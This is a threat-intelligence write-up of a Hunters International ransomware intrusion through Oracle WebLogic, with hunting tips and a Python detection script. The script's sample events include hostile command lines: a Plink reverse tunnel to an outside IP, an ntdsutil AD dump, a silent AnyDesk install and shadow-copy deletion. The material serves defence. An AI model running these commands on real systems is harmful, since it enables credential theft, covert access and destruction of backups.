Insights of a Hunters International Intrusion from Oracle WebLogic
An intrusion involving Hunters International, a ransomware-as-a-service (RaaS) group, was observed between July and September 2024, during which the group compromised an organization by exploiting an Oracle web server for initial access, as identified by Forescout. The ransomware group’s primary motivation is financial gain, with its global impact predominantly centered in the United States, the most affected region since the group emerged in October 2023. Detailing the group’s operations, Forescout threat researchers Sai Molige and Prashant Tilekar noted, "In November 2024 alone, the group claimed 24 victim organizations — for an average of nearly one per day." Victim tracking identified a total of 245 affected organizations as of the January 9, 2025 report, with 129 victims in the United States, followed by 14 in the United Kingdom and 11 in Canada. The group has targeted a diverse range of industries, including automotive, healthcare, manufacturing, education, financial services, food, and logistics. Connections within the cybercrime ecosystem revealed coding similarities with Hive ransomware and affiliations with Snatch ransomware, along with ties to ALPHV/BlackCat and LockBit.
Forescout’s detailed examination of the group’s tactics, techniques, and procedures (TTPs) during observed intrusions summarizes an attack chain that begins with exploiting the Oracle WebLogic debug port (8453) to deploy the China Chopper web shell for persistence and command execution. Initial reconnaissance was performed using basic tools such as "whoami," "ipconfig," and "nltest" to gather system and network details, while "dsquery" facilitated domain enumeration to map trust relationships. Credential access was achieved through system and SAM hive dumps, followed by registry save operations to extract sensitive data. Lateral movement was conducted using tools like Plink, Impacket, RDP, ncat, and AnyDesk. Database servers were targeted with "xp_cmdshell" to dump database content via "mysqldump." Before deploying ransomware, the attackers disabled security measures like Data Execution Prevention (DEP) and firewalls and deleted shadow copies to hinder recovery efforts.
Further insights revealed additional TTPs that complemented the summarized attack steps. The attackers initiated their campaign by deploying renamed AutoIT malware, leveraging it for reconnaissance and lateral movement. Privilege escalation was achieved through the exploitation of the ZeroLogon vulnerability (CVE-2020-1472), while Oracle WebLogic CVE-2020-14644 was exploited for initial access, a vulnerability previously identified as a Known Exploited Vulnerability (KEV) by CISA. Forescout highlighted process activity associated with Java, particularly when spawning suspicious child processes. "The attackers connected to the Oracle WebLogic debug port (8453), using java.exe to execute commands and install the China Chopper web shell for persistence," Forescout reported. Credential theft activities included registry modifications and saving results to a text file, with attackers dumping the Active Directory database using "ntdsutil" commands such as "ifm" to create full dumps. Lateral movement leveraged tools like SMB, RDP, Plink, Impacket, AnyDesk, and TeamViewer. Activity on Linux hosts involved parsing and filtering the "/etc/passwd" file to enumerate user accounts and privileges. Malicious actions extended to database servers, where "xp_cmdshell" and "mysqldump" were used to extract sensitive data. Data exfiltration was performed using the MEGA file-sharing platform.
Forescout provided several critical hunting tips to detect and mitigate activities associated with Hunters International. Baseline monitoring of account usage, RDP connections, enumeration activity, and large outbound data transfers is essential. Key indicators include AnyDesk usage via the command line, SSH tunneling with Plink on non-standard ports, and Impacket activity, which should be analyzed through SMB traffic patterns, service creation events, and authentication logs. Monitoring SMB traffic for hidden share creation and RPC activity can provide insights into lateral movement. Parent-child process relationships, particularly Java spawning child processes such as cmd.exe, should also be scrutinized. RMM tools such as AnyDesk and TeamViewer require validation due to their prevalent use, with particular attention to unauthorized installations. It is also advisable to track scheduled tasks and Windows events related to task creation, alongside registry changes and file creation in the "System32\Tasks" folder. To address protocol abuse and lateral movement, Forescout emphasized monitoring sequential RPC connections, hidden SMB shares, and large-scale file transfers via SMB. The use of tunneling tools like Plink, deviations in command-line patterns, and unauthorized remote desktop sessions were noted
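As an added example (not Forescout's own detection content), the following Python hunt applies several of the indicators described above, Java spawning a shell, Plink on a non-standard port, ntdsutil "ifm" dumps, RMM tools launched from a shell, and shadow copy deletion, to constructed process-creation events; the event field names and the sample command lines are assumptions of the example.

```python
"""Hunting checks for the TTPs above over constructed process events (example, not Forescout's)."""
import re
from typing import Callable, Dict, List
Event = Dict[str, str]
SHELLS = {"cmd.exe", "powershell.exe"}
# Constructed sample events, loosely modelled on Sysmon Event ID 1;
# the field names are an assumption of this example.
SAMPLE_EVENTS: List[Event] = [
    {"host": "web01", "parent": "java.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"host": "web01", "parent": "cmd.exe", "image": "plink.exe",
     "cmdline": "plink.exe -N -R 8443:127.0.0.1:3389 -P 2222 user@203.0.113.10"},
    {"host": "dc01", "parent": "cmd.exe", "image": "ntdsutil.exe",
     "cmdline": 'ntdsutil.exe "ac i ntds" ifm "create full C:\\dump" q q'},
    {"host": "ws07", "parent": "cmd.exe", "image": "anydesk.exe",
     "cmdline": "anydesk.exe --install C:\\ProgramData\\AnyDesk --silent"},
    {"host": "ws07", "parent": "cmd.exe", "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws07", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c dir"},  # benign: must not match any rule
]

def java_spawns_shell(e: Event) -> bool:
    # Web-shell style execution: the WebLogic java.exe spawning a command shell.
    return e["parent"].lower() == "java.exe" and e["image"].lower() in SHELLS

def plink_nonstandard_port(e: Event) -> bool:
    # Plink SSH tunnelling (-P <port>) to a server not listening on 22.
    m = re.search(r"(?:^|\s)-P\s+(\d+)", e["cmdline"])
    return e["image"].lower() == "plink.exe" and bool(m) and int(m.group(1)) != 22

def ntdsutil_ifm(e: Event) -> bool:
    # ntdsutil "ifm" full dump of the Active Directory database.
    return e["image"].lower() == "ntdsutil.exe" and bool(re.search(r"\bifm\b", e["cmdline"], re.I))

def rmm_from_shell(e: Event) -> bool:
    # AnyDesk/TeamViewer launched with arguments from a command shell, not by a user click.
    return (e["image"].lower() in {"anydesk.exe", "teamviewer.exe"}
            and e["parent"].lower() in SHELLS and len(e["cmdline"].split()) > 1)

def shadow_copy_deletion(e: Event) -> bool:
    # vssadmin wiping shadow copies ahead of ransomware deployment.
    return e["image"].lower() == "vssadmin.exe" and "delete shadows" in e["cmdline"].lower()

RULES: Dict[str, Callable[[Event], bool]] = {f.__name__: f for f in (
    java_spawns_shell, plink_nonstandard_port, ntdsutil_ifm, rmm_from_shell, shadow_copy_deletion)}

def hunt(events: List[Event]) -> List[Dict[str, str]]:
    # One finding per (event, rule) match; an empty list means nothing fired.
    return [{"host": e["host"], "rule": name, "cmdline": e["cmdline"]}
            for e in events for name, rule in RULES.items() if rule(e)]
```

Each rule is a starting point for a baseline comparison, so a hit on a host where the tool is sanctioned should be validated against the allow-list rather than treated as a confirmed intrusion.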